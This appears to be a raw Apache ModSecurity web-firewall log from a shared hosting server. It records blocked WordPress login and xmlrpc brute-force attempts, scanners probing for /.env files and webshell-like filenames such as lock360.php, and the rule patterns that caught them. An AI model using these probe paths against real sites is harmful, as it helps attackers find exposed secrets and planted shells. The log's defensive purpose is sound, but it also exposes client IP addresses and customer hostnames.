[Tue May 26 18:02:18.119207 2026] [security2:error] [pid 946381:tid 946421] [remote 51.91.98.45:39938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWS0tiTu5WG4Dm5WpoeswAAOSc"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:02:18.899958 2026] [security2:error] [pid 946381:tid 946628] [client 85.11.167.19:60614] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "visnagar.ucdc.co.in"] [uri "/.env"] [unique_id "ahWS0tiTu5WG4Dm5WpoexwAAAHU"]
[Tue May 26 18:02:18.921440 2026] [security2:error] [pid 946381:tid 946504] [remote 129.121.76.191:57978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWS0tiTu5WG4Dm5WpoexgAAJno"]
[Tue May 26 18:02:19.338365 2026] [security2:error] [pid 946381:tid 946505] [remote 129.121.76.191:57978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWS09iTu5WG4Dm5Wpoe2gAAXXs"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:02:19.529535 2026] [security2:error] [pid 946381:tid 946533] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS09iTu5WG4Dm5Wpoe1gAAABY"]
[Tue May 26 18:02:19.845280 2026] [security2:error] [pid 946381:tid 946547] [client 85.11.167.19:60616] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "visnagar.ucdc.co.in"] [uri "/"] [unique_id "ahWS09iTu5WG4Dm5Wpoe8wAAACQ"]
[Tue May 26 18:02:19.906325 2026] [security2:error] [pid 946381:tid 946428] [remote 5.42.158.148:36920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWS09iTu5WG4Dm5Wpoe6wAACi4"]
[Tue May 26 18:02:22.710395 2026] [security2:error] [pid 946381:tid 946601] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS1tiTu5WG4Dm5WpofJwAAAFo"]
[Tue May 26 18:02:24.843425 2026] [security2:error] [pid 946381:tid 946627] [client 82.76.238.33:57340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWS2NiTu5WG4Dm5WpofXQAAAHQ"]
[Tue May 26 18:02:24.843586 2026] [security2:error] [pid 946381:tid 946627] [client 82.76.238.33:57340] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWS2NiTu5WG4Dm5WpofXQAAAHQ"]
[Tue May 26 18:02:25.498006 2026] [security2:error] [pid 946381:tid 946635] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS2diTu5WG4Dm5WpofaAAAAHw"]
[Tue May 26 18:02:26.273756 2026] [security2:error] [pid 946381:tid 946548] [client 173.239.211.241:36215] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWS2diTu5WG4Dm5WpofewAAACU"]
[Tue May 26 18:02:27.434688 2026] [security2:error] [pid 946381:tid 946461] [remote 198.38.81.14:42906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS29iTu5WG4Dm5WpofnAAAck8"]
[Tue May 26 18:02:28.057300 2026] [security2:error] [pid 946381:tid 946555] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS29iTu5WG4Dm5WpofqQAAACw"]
[Tue May 26 18:02:28.425677 2026] [security2:error] [pid 946381:tid 946445] [remote 173.212.233.81:41308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWS3NiTu5WG4Dm5WpofuQAAED8"]
[Tue May 26 18:02:28.686084 2026] [security2:error] [pid 946381:tid 946534] [client 152.39.244.120:38499] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWS2diTu5WG4Dm5WpofZQAAFyk"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/30fdf6bbbfd7e3c7-30fdf6bbbfd7e3c7-combined.css
[Tue May 26 18:02:28.998683 2026] [security2:error] [pid 946381:tid 946463] [remote 173.212.233.81:41308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWS3NiTu5WG4Dm5WpofxwAAMlE"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:02:29.044782 2026] [security2:error] [pid 946381:tid 946436] [remote 31.24.155.180:32804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS3NiTu5WG4Dm5WpofxQAAUDY"]
[Tue May 26 18:02:29.334551 2026] [security2:error] [pid 946381:tid 946432] [remote 31.24.155.180:32804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS3diTu5WG4Dm5WpofzgAAIDI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:02:30.037492 2026] [security2:error] [pid 946381:tid 946625] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS3diTu5WG4Dm5Wpof2wAAAHI"]
[Tue May 26 18:02:33.623276 2026] [security2:error] [pid 946381:tid 946568] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS4diTu5WG4Dm5WpogMgAAADk"]
[Tue May 26 18:02:35.119815 2026] [security2:error] [pid 946381:tid 946634] [client 82.76.238.33:57743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWS49iTu5WG4Dm5WpogYQAAAHs"]
[Tue May 26 18:02:35.119970 2026] [security2:error] [pid 946381:tid 946634] [client 82.76.238.33:57743] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWS49iTu5WG4Dm5WpogYQAAAHs"]
[Tue May 26 18:02:35.872875 2026] [security2:error] [pid 946381:tid 946619] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS49iTu5WG4Dm5WpogawAAAGw"]
[Tue May 26 18:02:37.885773 2026] [security2:error] [pid 946381:tid 946634] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS5diTu5WG4Dm5WpognwAAAHs"]
[Tue May 26 18:02:38.408156 2026] [security2:error] [pid 946381:tid 946583] [client 45.150.177.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWS5tiTu5WG4Dm5WpogsgAAAEg"], referer: https://www.anujtradingco.com/
[Tue May 26 18:02:38.627346 2026] [security2:error] [pid 946381:tid 946484] [remote 5.42.158.148:47220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS5tiTu5WG4Dm5WpogugAAWmY"]
[Tue May 26 18:02:38.844118 2026] [security2:error] [pid 946381:tid 946420] [remote 79.116.52.1:34786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.52.116.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS5tiTu5WG4Dm5WpogvgAAEiY"]
[Tue May 26 18:02:39.262717 2026] [security2:error] [pid 946381:tid 946543] [client 45.150.177.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWS59iTu5WG4Dm5WpogzAAAACA"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1273881&moderation-hash=01577b868547c04a61345d1947a28235
[Tue May 26 18:02:40.331150 2026] [security2:error] [pid 946381:tid 946581] [client 179.57.56.103:55861] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.56.57.179.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pronumbers.com.au"] [uri "/xmlrpc.php"] [unique_id "ahWS6NiTu5WG4Dm5Wpog5wAAAEY"]
[Tue May 26 18:02:40.331284 2026] [security2:error] [pid 946381:tid 946581] [client 179.57.56.103:55861] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "pronumbers.com.au"] [uri "/xmlrpc.php"] [unique_id "ahWS6NiTu5WG4Dm5Wpog5wAAAEY"]
[Tue May 26 18:02:40.996111 2026] [security2:error] [pid 946381:tid 946550] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS6NiTu5WG4Dm5Wpog8QAAACc"]
[Tue May 26 18:02:43.135795 2026] [security2:error] [pid 946381:tid 946555] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS6tiTu5WG4Dm5WpohKAAAACw"]
[Tue May 26 18:02:44.559763 2026] [security2:error] [pid 946381:tid 946496] [remote 176.61.149.56:54914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.149.61.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS7NiTu5WG4Dm5WpohVwAAEXI"]
[Tue May 26 18:02:44.953615 2026] [security2:error] [pid 946381:tid 946625] [client 185.191.171.11:41196] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWS7NiTu5WG4Dm5WpohZgAAAHI"]
[Tue May 26 18:02:44.953762 2026] [security2:error] [pid 946381:tid 946625] [client 185.191.171.11:41196] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWS7NiTu5WG4Dm5WpohZgAAAHI"]
[Tue May 26 18:02:45.493037 2026] [security2:error] [pid 946381:tid 946532] [client 82.76.238.33:58154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWS7diTu5WG4Dm5WpohdwAAABU"]
[Tue May 26 18:02:45.493228 2026] [security2:error] [pid 946381:tid 946532] [client 82.76.238.33:58154] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWS7diTu5WG4Dm5WpohdwAAABU"]
[Tue May 26 18:02:45.541121 2026] [security2:error] [pid 946381:tid 946581] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS7diTu5WG4Dm5WpohbQAAAEY"]
[Tue May 26 18:02:45.884377 2026] [security2:error] [pid 946381:tid 946601] [client 202.76.175.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS7diTu5WG4Dm5WpohdgAAAFo"]
[Tue May 26 18:02:46.106414 2026] [security2:error] [pid 946381:tid 946526] [client 74.7.175.169:53820] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "midrivermarina.com"] [uri "/robots.txt"] [unique_id "ahWS7tiTu5WG4Dm5WpohhgAAAA8"]
[Tue May 26 18:02:46.656026 2026] [security2:error] [pid 946381:tid 946604] [client 45.150.177.240:60887] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWS7tiTu5WG4Dm5WpohhwAAAF0"], referer: https://anujtradingco.com
[Tue May 26 18:02:48.263167 2026] [security2:error] [pid 946381:tid 946568] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS79iTu5WG4Dm5WpohtQAAADk"]
[Tue May 26 18:02:48.845659 2026] [security2:error] [pid 946381:tid 946392] [remote 88.198.165.116:39898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWS8NiTu5WG4Dm5Wpoh3QAASgo"]
[Tue May 26 18:02:51.437129 2026] [security2:error] [pid 946381:tid 946625] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS89iTu5WG4Dm5WpoiIAAAAHI"]
[Tue May 26 18:02:51.894038 2026] [security2:error] [pid 946381:tid 946418] [remote 103.95.119.103:57524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS89iTu5WG4Dm5WpoiSAAAPSQ"]
[Tue May 26 18:02:52.707604 2026] [security2:error] [pid 946381:tid 946451] [remote 103.95.119.103:57524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS9NiTu5WG4Dm5WpoiXwAASUU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:02:52.781731 2026] [security2:error] [pid 946381:tid 946462] [remote 209.42.20.53:36814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWS9NiTu5WG4Dm5WpoiXQAAJFA"]
[Tue May 26 18:02:53.620923 2026] [security2:error] [pid 946381:tid 946533] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS9diTu5WG4Dm5WpoicgAAABY"]
[Tue May 26 18:02:54.947515 2026] [security2:error] [pid 946381:tid 946456] [remote 103.230.156.120:40742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWS9tiTu5WG4Dm5WpoiqAAAYEo"]
[Tue May 26 18:02:55.089948 2026] [security2:error] [pid 946381:tid 946629] [client 194.187.176.13:33936] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cuatrodoce.com.mx"] [uri "/index.php"] [unique_id "ahWS9tiTu5WG4Dm5WpoikAAAAHY"]
[Tue May 26 18:02:55.147259 2026] [http2:info] [pid 960743:tid 960743] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:02:55.465770 2026] [security2:error] [pid 960743:tid 960888] [client 194.187.176.191:33944] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cuatrodoce.com.mx"] [uri "/index.php"] [unique_id "ahWS9_QvEln_BHBy2zJnggAAAJQ"]
[Tue May 26 18:02:55.970139 2026] [security2:error] [pid 960743:tid 960892] [client 82.76.238.33:58566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWS9_QvEln_BHBy2zJnjwAAAJg"]
[Tue May 26 18:02:55.970293 2026] [security2:error] [pid 960743:tid 960892] [client 82.76.238.33:58566] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWS9_QvEln_BHBy2zJnjwAAAJg"]
[Tue May 26 18:02:57.621836 2026] [security2:error] [pid 960743:tid 960964] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS-fQvEln_BHBy2zJnrgAAAOA"]
[Tue May 26 18:02:59.144898 2026] [security2:error] [pid 960743:tid 960919] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS-vQvEln_BHBy2zJn1QAAALM"]
[Tue May 26 18:02:59.292402 2026] [security2:error] [pid 960743:tid 960951] [client 185.192.70.72:30347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/bless.php"] [unique_id "ahWS-_QvEln_BHBy2zJn7gAAANM"]
[Tue May 26 18:03:00.460031 2026] [security2:error] [pid 960743:tid 960979] [client 185.192.70.91:63045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/O-Simple.php"] [unique_id "ahWS_PQvEln_BHBy2zJoBgAAAO8"]
[Tue May 26 18:03:01.139871 2026] [security2:error] [pid 960743:tid 960885] [client 185.192.70.99:52951] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/lock360.php"] [unique_id "ahWS_fQvEln_BHBy2zJoGgAAAJE"]
[Tue May 26 18:03:01.355266 2026] [security2:error] [pid 960743:tid 960989] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWS_PQvEln_BHBy2zJoDwAAAPk"]
[Tue May 26 18:03:02.346814 2026] [security2:error] [pid 960743:tid 960938] [client 185.192.70.97:60587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/zwso.php"] [unique_id "ahWS_vQvEln_BHBy2zJoNgAAAMY"]
[Tue May 26 18:03:04.191180 2026] [security2:error] [pid 960743:tid 960873] [client 185.192.70.91:25319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/chosen.php"] [unique_id "ahWTAPQvEln_BHBy2zJoXgAAAIU"]
